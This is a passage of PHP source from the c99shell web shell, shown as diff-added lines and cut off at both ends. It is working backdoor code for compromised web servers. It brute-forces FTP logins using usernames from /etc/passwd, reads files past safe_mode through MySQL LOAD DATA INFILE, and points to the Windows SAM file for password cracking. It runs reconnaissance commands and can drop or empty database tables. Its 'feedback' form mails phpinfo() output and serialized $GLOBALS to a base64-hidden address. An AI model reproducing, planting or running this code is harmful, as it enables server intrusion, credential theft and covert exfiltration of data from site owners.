width=\"11\" border=\"0\"></a> "; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> "; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a> </td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging? <input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file? <input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail? <input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp + <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only + <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive + <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = true; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = 